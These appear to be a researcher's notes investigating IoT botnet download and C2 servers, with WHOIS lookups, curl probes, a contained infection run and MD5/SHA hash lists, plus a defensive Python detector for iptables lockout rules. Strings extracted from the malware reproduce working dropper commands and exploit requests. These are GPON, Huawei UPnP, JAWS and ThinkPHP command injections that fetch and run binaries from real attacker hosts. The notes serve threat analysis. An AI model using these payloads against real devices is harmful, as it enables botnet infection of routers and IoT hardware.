Content-Type: text/html; charset=UTF-8

178.18.250.52

inetnum:        178.18.248.0 - 178.18.255.255
netname:        CONTABO
country:        DE
admin-c:        MH7476-RIPE
tech-c:         MH7476-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-CONTABO
created:        2021-04-12T19:10:04Z
last-modified:  2021-04-12T19:10:04Z
source:         RIPE

person:         Wilhelm Zwalina
address:        Contabo GmbH
address:        Aschauer Str. 32a
address:        81549 Muenchen
phone:          +49 89 21268372
fax-no:         +49 89 21665862
nic-hdl:        MH7476-RIPE
mnt-by:         MNT-CONTABO
mnt-by:         MNT-GIGA-HOSTING
created:        2010-01-04T10:41:37Z
last-modified:  2020-04-24T16:09:30Z
source:         RIPE
$ curl -i http://178.18.250.52/
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:53:38 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 01 Feb 2023 07:33:22 GMT
ETag: "18-5f39e76880f08"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/html; charset=UTF-8

<center>vality</center>
$ curl -i http://178.18.250.52/a/
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:53:40 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 01 Feb 2023 08:11:10 GMT
ETag: "18-5f39efdb1018b"
Accept-Ranges: bytes
Content-Length: 24
Content-Type: text/html; charset=UTF-8

<center>vality</center>
User-Agent:
Developers: EcstasyCode#8838
VGNLGVCFOKL

Seen that Discord ID above…

163.123.143.126

inetnum:        163.0.0.0 - 163.255.255.255
netname:        ERX-NETBLOCK
descr:          Early registration addresses
country:        AU
admin-c:        IANA1-AP
tech-c:         IANA1-AP
abuse-c:        AA1452-AP
status:         ALLOCATED PORTABLE
mnt-by:         APNIC-HM
mnt-lower:      APNIC-HM
mnt-irt:        IRT-APNIC-AP
last-modified:  2021-04-16T06:53:35Z
source:         APNIC

irt:            IRT-APNIC-AP
address:        Brisbane, Australia
e-mail:         helpdesk@apnic.net
abuse-mailbox:  helpdesk@apnic.net
admin-c:        HM20-AP
tech-c:         NO4-AP
auth:           # Filtered
remarks:        APNIC is a Regional Internet Registry.
remarks:        We do not operate the referring network and
remarks:        are unable to investigate complaints of network abuse.
remarks:        For information about IRT, see www.apnic.net/irt
remarks:        helpdesk@apnic.net was validated on 2020-02-03
mnt-by:         APNIC-HM
last-modified:  2020-02-03T02:04:33Z
source:         APNIC

role:           ABUSE APNICAP
address:        Brisbane, Australia
country:        ZZ
phone:          +000000000
e-mail:         helpdesk@apnic.net
admin-c:        HM20-AP
tech-c:         NO4-AP
nic-hdl:        AA1452-AP
remarks:        Generated from irt object IRT-APNIC-AP
abuse-mailbox:  helpdesk@apnic.net
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-19T06:01:41Z
source:         APNIC
$ curl -i http://163.123.143.126/
HTTP/1.1 403 Forbidden
Date: Fri, 03 Feb 2023 19:07:01 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
$ curl -i http://163.123.143.126/bins/
HTTP/1.1 403 Forbidden
Date: Fri, 03 Feb 2023 19:08:55 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /bins/
on this server.</p>
</body></html>

Some interesting lines in the dropper: a different IP to check, and also some iptables rules:

wget http://195.133.18.119/bins/dark.86_64; curl -O http://195.133.18.119/bins/dark.86_64;cat dark.86_64 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
iptables -F
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
iptables -A INPUT -p tcp --dport 9000 -j DROP
iptables -A INPUT -p tcp --dport 8089 -j DROP
iptables -A INPUT -p tcp --dport 7070 -j DROP
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 9090 -j DROP
iptables -A INPUT -p tcp --dport 161 -j DROP
iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp --dport 9600 -j DROP
iptables -A INPUT -p tcp --dport 21412 -j DROP
iptables -A INPUT -p tcp --dport 5986 -j DROP
iptables -A INPUT -p tcp --dport 5985 -j DROP
iptables -A INPUT -p tcp --dport 17998 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
iptables-save
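Added example, not from the original notes or the dropper: a Python check over `iptables-save` output that reports unconditional INPUT DROP rules on the ports the dropper above closes (SSH, telnet, HTTP, TR-069, WinRM, SNMP). Several of those dropped together on a device that should be reachable is the footprint of a bot locking out both rival infections and legitimate administration. The port-to-service map and the sample ruleset are constructed for the example.

```python
import re

# Ports the dropper above drops on INPUT, with the service each normally carries.
# This mapping is the example's own assumption, not something the dropper states.
LOCKOUT_PORTS = {
    22: "ssh", 23: "telnet", 2323: "telnet-alt", 80: "http", 443: "https",
    8080: "http-alt", 7547: "tr-069", 5985: "winrm", 5986: "winrm-tls",
    161: "snmp", 5555: "adb",
}

# Constructed iptables-save output for a host that ran the dropper's rules,
# plus one source-scoped rule and one ACCEPT that should not be flagged.
SAMPLE_IPTABLES_SAVE = """\
# Generated by iptables-save v1.8.7 on Thu Feb  9 23:10:00 2023
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 2323 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 7547 -j DROP
-A INPUT -p tcp -m tcp --dport 3306 -j DROP
-A INPUT -s 192.0.2.0/24 -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 8443 -j ACCEPT
COMMIT
"""

# One appended rule: "-A <chain> <match options> -j <target>"
RULE_RE = re.compile(r"^-A (?P<chain>\S+)(?P<opts>.*) -j (?P<target>\S+)$")
DPORT_RE = re.compile(r"--dport (\d+)")
# A "-s" match means the rule is scoped to a source, i.e. a normal firewall
# policy rather than a blanket lockout.
SRC_RE = re.compile(r"(?:^| )-s \S+")


def parse_rules(text):
    """Return (chain, dport or None, target, source_scoped) per -A rule."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        opts = m.group("opts")
        dp = DPORT_RE.search(opts)
        rules.append((
            m.group("chain"),
            int(dp.group(1)) if dp else None,
            m.group("target"),
            bool(SRC_RE.search(opts)),
        ))
    return rules


def lockout_findings(text, min_ports=3):
    """Report blanket INPUT DROPs on lockout ports; alert when several co-occur."""
    blocked = {}
    for chain, dport, target, scoped in parse_rules(text):
        if chain != "INPUT" or target != "DROP" or scoped:
            continue
        if dport in LOCKOUT_PORTS:
            blocked[dport] = LOCKOUT_PORTS[dport]
    return {"blocked": blocked, "alert": len(blocked) >= min_ports}


if __name__ == "__main__":
    print(lockout_findings(SAMPLE_IPTABLES_SAVE))
```

Run it against `iptables-save` output collected from a suspect device; a DROP on 7547 (TR-069) or 2323 on a consumer gateway is rarely an administrator's doing.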

vzwebsite.ir

domain:		vzwebsite.ir
ascii:		vzwebsite.ir
nserver:	v1s1.xundns.com
nserver:	v1s2.xundns.com
source:		IRNIC # Filtered
vzwebsite.ir.		228	IN	A	46.148.39.36
$ curl -i http://vzwebsite.ir/
HTTP/1.1 403 Forbidden
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
date: Thu, 09 Feb 2023 13:00:28 GMT

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
$ curl -i http://vzwebsite.ir/fuez/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:35 GMT
etag: "63d5606b-6"
accept-ranges: bytes
content-length: 6
date: Thu, 09 Feb 2023 12:59:38 GMT

rolled
$ curl -i http://vzwebsite.ir/siffredi/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:36 GMT
etag: W/"63d5606c-15"
transfer-encoding: chunked
date: Thu, 09 Feb 2023 13:01:01 GMT

rickrolledyoubitchies

strings:

cd /data/local/tmp && cd /tmp;rm -rf adb adb.sh; busybox wget http://vzwebsite.ir/adb/adb.sh -O vzwxz; chmod 777 vzwxz;./vzwxz ADB; curl -O http://vzwebsite.ir/adb/adb.sh; chmod 777 adb.sh; sh adb.sh ADB; rm -rf adb.sh vzwxz
$ curl -i http://vzwebsite.ir/adb/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:33 GMT
etag: "63d56069-8"
accept-ranges: bytes
content-length: 8
date: Thu, 09 Feb 2023 13:04:18 GMT

honeypot

Deliberate safe infection in a contained VM:

# file dlz.x86_64
dlz.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

# ./dlz.x86_64
Binary error: exec format not supported.
/

# file dlz.x86_64
dlz.x86_64: empty

Clearly deletes itself.

$ grep -E " DST=.* DPT=" contained_dlz.txt | sed -r "s/^.* DST=([^ ]+) .* DPT=([^ ]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail
      3 239.85.203.76:8081
      3 239.90.50.0:9000
      3 239.92.161.134:5555
      3 239.93.238.107:5555
      3 239.95.147.183:8088
      3 239.95.199.140:5555
      3 239.97.153.165:5555
      3 239.97.17.202:9000
      3 239.99.1.152:8888
    126 185.132.53.77:1963
$ nmap -Pn -p 21,22,80,443,8080,1963 185.132.53.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 22:58 UTC
Nmap scan report for 185.132.53.77
Host is up (0.022s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
1963/tcp open  webmachine
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds
$ nc -vv 185.132.53.77 1963
185.132.53.77: inverse host lookup failed: Unknown host
(UNKNOWN) [185.132.53.77] 1963 (?) open
 sent 0, rcvd 0

Really can’t tell if this is a working C2 server or not…

17:00 -!- Irssi: Looking up 185.132.53.77
17:00 -!- Irssi: Connecting to 185.132.53.77 [185.132.53.77] port 1963
17:00 -!- Irssi: Connection to 185.132.53.77 established
17:00 -!- Irssi: warning Connection reset by peer
17:00 -!- Irssi: Connection lost to 185.132.53.77

Doesn’t appear to be a working IRC server at least, or a port to listen on. It might have some crazy port knocking stuff but I’m not digging that deep.

163.123.142.241

irt:            IRT-APNIC-AP
address:        Brisbane, Australia
e-mail:         helpdesk@apnic.net
abuse-mailbox:  helpdesk@apnic.net
admin-c:        HM20-AP
tech-c:         NO4-AP
auth:           # Filtered
remarks:        APNIC is a Regional Internet Registry.
remarks:        We do not operate the referring network and
remarks:        are unable to investigate complaints of network abuse.
remarks:        For information about IRT, see www.apnic.net/irt
remarks:        helpdesk@apnic.net was validated on 2020-02-03
mnt-by:         APNIC-HM
last-modified:  2020-02-03T02:04:33Z
source:         APNIC

role:           ABUSE APNICAP
address:        Brisbane, Australia
country:        ZZ
phone:          +000000000
e-mail:         helpdesk@apnic.net
admin-c:        HM20-AP
tech-c:         NO4-AP
nic-hdl:        AA1452-AP
remarks:        Generated from irt object IRT-APNIC-AP
abuse-mailbox:  helpdesk@apnic.net
mnt-by:         APNIC-ABUSE
last-modified:  2020-05-19T06:01:41Z
source:         APNIC
$ curl -i http://163.123.142.241/
HTTP/1.1 200 OK
Date: Thu, 09 Feb 2023 23:08:02 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Fri, 03 Feb 2023 08:50:54 GMT
ETag: "29cd-5f3c7c78327b4"
Accept-Ranges: bytes
Content-Length: 10701
Vary: Accept-Encoding
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Debian Default Page: It works</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }

Deliberate infection:

InfectedNight did its job

1.246.222.228:2200

inetnum:        1.234.0.0 - 1.255.255.255
netname:        broadNnet
descr:          SK Broadband Co Ltd
admin-c:        IM670-AP
tech-c:         IM670-AP
country:        KR
status:         ALLOCATED PORTABLE
mnt-by:         MNT-KRNIC-AP
mnt-irt:        IRT-KRNIC-KR
last-modified:  2017-02-03T00:38:09Z
source:         APNIC

irt:            IRT-KRNIC-KR
address:        Jeollanam-do Naju-si Jinheung-gil
e-mail:         irt@nic.or.kr
abuse-mailbox:  irt@nic.or.kr
admin-c:        IM574-AP
tech-c:         IM574-AP
auth:           # Filtered
remarks:        irt@nic.or.kr was validated on 2020-04-09
mnt-by:         MNT-KRNIC-AP
last-modified:  2021-06-15T06:21:49Z
source:         APNIC
$ curl -i http://1.246.222.228:2200/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 95268
Connection: close
Content-Type: application/zip
$ curl -i http://1.246.222.228:2200/
HTTP/1.1 200 OK
Server: nginx
Content-Length: 95268
Connection: close
Content-Type: application/zip

proxy.akur.group

proxy.akur.group.	87	IN	A	113.30.191.198
inetnum:        113.30.188.0 - 113.30.191.255
netname:        STUB-113-30-188SLASH22
descr:          Transferred to the RIPE region on 2022-03-04T09:34:16Z.
country:        ZZ
admin-c:        STUB-AP
tech-c:         STUB-AP
status:         ALLOCATED PORTABLE
mnt-by:         APNIC-STUB
mnt-irt:        IRT-STUB-AP
last-modified:  2022-03-03T23:45:30Z
source:         APNIC

irt:            IRT-STUB-AP
address:        N/A
e-mail:         no-email@apnic.net
abuse-mailbox:  no-email@apnic.net
admin-c:        STUB-AP
tech-c:         STUB-AP
auth:           # Filtered
remarks:        IRT for stub records.
remarks:        We do not operate the referring network and
remarks:        are unable to investigate complaints of network abuse.
remarks:        For information about IRT, see www.apnic.net/irt
mnt-by:         APNIC-HM
last-modified:  2019-09-23T05:22:43Z
source:         APNIC
$ curl -i http://113.30.191.198/
HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 08:40:50 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sun, 12 Feb 2023 18:46:19 GMT
ETag: "0-5f4852573b275"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://113.30.191.198/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 08:41:15 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sun, 12 Feb 2023 18:46:19 GMT
ETag: "0-5f4852573b65d"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Strings in the binary (despite it being UPX compressed):

POST /cdn-cgi/
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://113.30.191.198/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g proxy.akur.group -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+proxy.akur.group/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive

176.123.1.44

inetnum:        176.123.0.0 - 176.123.11.255
netname:        AlexHost-NET
country:        MD
org:            ORG-ALEX2-RIPE
admin-c:        SZ3268-RIPE
tech-c:         SZ3268-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-END-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-routes:     CLOUDATAMD-MNT
mnt-domains:    CLOUDATAMD-MNT
created:        2019-09-03T08:35:42Z
last-modified:  2019-11-13T18:34:36Z
source:         RIPE # Filtered
sponsoring-org: ORG-Vs35-RIPE
$ curl -i http://176.123.1.44/
HTTP/1.1 403 Forbidden
Date: Thu, 02 Mar 2023 07:59:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
Index of /lx

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       a                2023-02-06 12:36  32K  
[   ]       apep.arm         2023-02-06 12:36  31K  
[   ]       apep.arm5        2023-02-06 12:36  27K  
[   ]       apep.arm6        2023-02-06 12:36  36K  
[   ]       apep.arm7        2023-02-06 12:36  56K  
[   ]       apep.m68k        2023-02-06 12:36 106K  
[   ]       apep.mips        2023-02-06 12:36  34K  
[   ]       apep.mpsl        2023-02-06 12:36  35K  
[   ]       apep.ppc         2023-02-06 12:36  32K  
[   ]       apep.sh4         2023-02-06 12:36  81K  
[   ]       apep.spc         2023-02-06 12:36  93K  
[   ]       apep.x86         2023-02-06 12:36  32K  
[   ]       u                2023-02-06 12:36  34K  
[   ]       x                2023-02-06 12:36  34K  
══════════════════════════════════════════════════════════════
a:         ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
apep.arm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
apep.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
apep.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
apep.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
apep.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
apep.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
apep.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
apep.ppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
apep.sh4:  ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
apep.spc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
apep.x86:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
u:         ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
x:         ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$(/bin/busybox wget -g 176.123.1.44 -l /tmp/monke -r /u; /bin/busybox chmod 777 * /tmp/monke; /tmp/monke selfrep.router)
GET /shell?cd+/tmp;wget+http://176.123.1.44/lx/apep.arm7+-O+p2d;+chmod+777+p2d;./p2d+laws.seflrep HTTP/1.1
User-Agent: Hello, pee
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://176.123.1.44/lx/apep.x86 -O /tmp/.apep; chmod 777 /tmp/.apep; /tmp/.apep ThinkphpRep' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Tsunami/2.0

update.rawupdater.cf

Fake-out compromised Tor Exit Node.

Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
update.rawupdater.cf.	3553	IN	A	193.111.250.222
[Querying whois.dot.cf]
[whois.dot.cf]
The domain you requested is not known in Freenoms database.
inetnum:        193.111.250.192 - 193.111.250.223
netname:        Mena-Hosting
country:        DE
admin-c:        MHDP2-RIPE
tech-c:         MHDP2-RIPE
status:         SUB-ALLOCATED PA
mnt-by:         FZ-IP-MNT
mnt-by:         mena-iheb-MNT
created:        2023-02-13T09:13:22Z
last-modified:  2023-02-13T09:13:29Z
source:         RIPE

role:           Mena Hosting DDoS Protection
address:        Tunisia MH. LTC 2100
nic-hdl:        MHDP2-RIPE
mnt-by:         mena-iheb-MNT
created:        2023-02-11T17:17:05Z
last-modified:  2023-02-11T17:17:05Z
source:         RIPE # Filtered
$ curl -i update.rawupdater.cf
HTTP/1.1 200 OK
Date: Thu, 02 Mar 2023 08:05:52 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 27 Feb 2023 21:09:41 GMT
ETag: "82d7-5f5b4e5c1d310"
Accept-Ranges: bytes
Content-Length: 33495
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!-- saved from url=(0022)http://103.196.37.111/ -->
<html lang="en-US" class=" lmpzut idc0_346"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>This is a Tor Exit Router</title>

Checking the official Tor exit node list: https://check.torproject.org/torbulkexitlist

It turns out that the 103.196.37.111 IP in the HTML is actually a Tor exit node; however, the 193.111.250.222 node is NOT listed. It could be running the software without being listed, but most likely they just ripped the HTML off a real Tor exit node as a fake landing page to trick people into thinking it is one. Clever technique, and a reminder that whenever a server claims to be a Tor exit node you should verify it against the official exit node list.

The jaws file points to 193.111.250.222, which is simply the DNS A record of the domain.

$ wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl
--2023-03-02 02:11:03--  http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl
Resolving update.rawupdater.cf (update.rawupdater.cf)... 193.111.250.222
Connecting to update.rawupdater.cf (update.rawupdater.cf)|193.111.250.222|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-02 02:11:03 ERROR 404: Not Found.
db0fa4b8db0333367e9bda3ab68b8042.arc:  ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
db0fa4b8db0333367e9bda3ab68b8042.arm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.i686: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.ppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.sh4:  ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.spc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.x86:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header

(MD5)

91740099c681f23cc4c27ccf0287a589  db0fa4b8db0333367e9bda3ab68b8042.arc
3508af12fd8be4ccba5d3c386c2e6fda  db0fa4b8db0333367e9bda3ab68b8042.arm
146bb7c27febd93adfad35dc45025ba9  db0fa4b8db0333367e9bda3ab68b8042.arm5
9a72ed27d39abead15e37863880b55eb  db0fa4b8db0333367e9bda3ab68b8042.arm6
a0adebe3c335c94f3633a9afb7bbbab1  db0fa4b8db0333367e9bda3ab68b8042.arm7
e85297fad92d520569591a415ac6c8b6  db0fa4b8db0333367e9bda3ab68b8042.i686
d231d386e156f453450e225a7075e30a  db0fa4b8db0333367e9bda3ab68b8042.m68k
12eaac62f4d046aa41b52035c4e2ea4e  db0fa4b8db0333367e9bda3ab68b8042.mips
1ac3046524036eac4eab794aa0ffda7c  db0fa4b8db0333367e9bda3ab68b8042.mpsl
fd9468288a2432269f7c3773919b5609  db0fa4b8db0333367e9bda3ab68b8042.ppc
5764527672b011b841d4c4d4a62a9324  db0fa4b8db0333367e9bda3ab68b8042.sh4
cc7ce67f4ec47858d88def70ed87b8bf  db0fa4b8db0333367e9bda3ab68b8042.spc
7df88635caffe6c0749aa4e14885fd1c  db0fa4b8db0333367e9bda3ab68b8042.x86

(SHA1)

53afe3593916ff0e7da04ce1c3ff610eb472f820  db0fa4b8db0333367e9bda3ab68b8042.arc
12a771c38182e4497666c337a746c6bb3875f023  db0fa4b8db0333367e9bda3ab68b8042.arm
e5d8caf3f66b92b0d1e56199e6aedf09cbc08ec5  db0fa4b8db0333367e9bda3ab68b8042.arm5
362d1ef5b2b82d9818a25c76df4da938b842d5f1  db0fa4b8db0333367e9bda3ab68b8042.arm6
e83b263a7e52946b120f190775dcde0cf81b5ed4  db0fa4b8db0333367e9bda3ab68b8042.arm7
1e285ee8e17f252ba4e66a7ebf33f318ad70292e  db0fa4b8db0333367e9bda3ab68b8042.i686
20c2a7bf41395d6c7b93bade5049ea4620c173ce  db0fa4b8db0333367e9bda3ab68b8042.m68k
b18b1cdecde8467d2e91b601503e6794da00a879  db0fa4b8db0333367e9bda3ab68b8042.mips
137cc2d26bd094b93dc48dd0f2edd3b7b5ec3f2a  db0fa4b8db0333367e9bda3ab68b8042.mpsl
ca56ec23a54c0d63f839a1ed73e65ef3096d144d  db0fa4b8db0333367e9bda3ab68b8042.ppc
30dcce0df3983fa3cf602900bc06559f33b833a5  db0fa4b8db0333367e9bda3ab68b8042.sh4
9d5d1f99b2d4963240952bc00ee355999d7b6ae6  db0fa4b8db0333367e9bda3ab68b8042.spc
86659eef9af060c639d1c66ec0e6db7b0c082723  db0fa4b8db0333367e9bda3ab68b8042.x86

(SHA256)

44cad51f03b4460be693eebed21362cf69d8d82a827876e144fe28ec47d98881  db0fa4b8db0333367e9bda3ab68b8042.arc
b0fe7070e55b6abb2fed30deb03c8f58050740831cd980b84655cb9a87ce116a  db0fa4b8db0333367e9bda3ab68b8042.arm
5094525d666a5ac6ac1af5a614f9c171cb34a953e58b129738dc9f92c4167efd  db0fa4b8db0333367e9bda3ab68b8042.arm5
24eea3987970cb20d1fb0636100582efadfecc2feee7402379d97f64d8efa4bc  db0fa4b8db0333367e9bda3ab68b8042.arm6
74ef0f11bf5110aafa7330c38fc4853fc1d3ecf17b21f14bec2c0d7906982dd4  db0fa4b8db0333367e9bda3ab68b8042.arm7
36ed58b43e23a2c01146a85bba39f35dbcf13e318355a5398bca71e525f023db  db0fa4b8db0333367e9bda3ab68b8042.i686
c2090b370410710ee348e8aeb2b84d377a9ed38d6c5e479c71ad8a32e9bfb374  db0fa4b8db0333367e9bda3ab68b8042.m68k
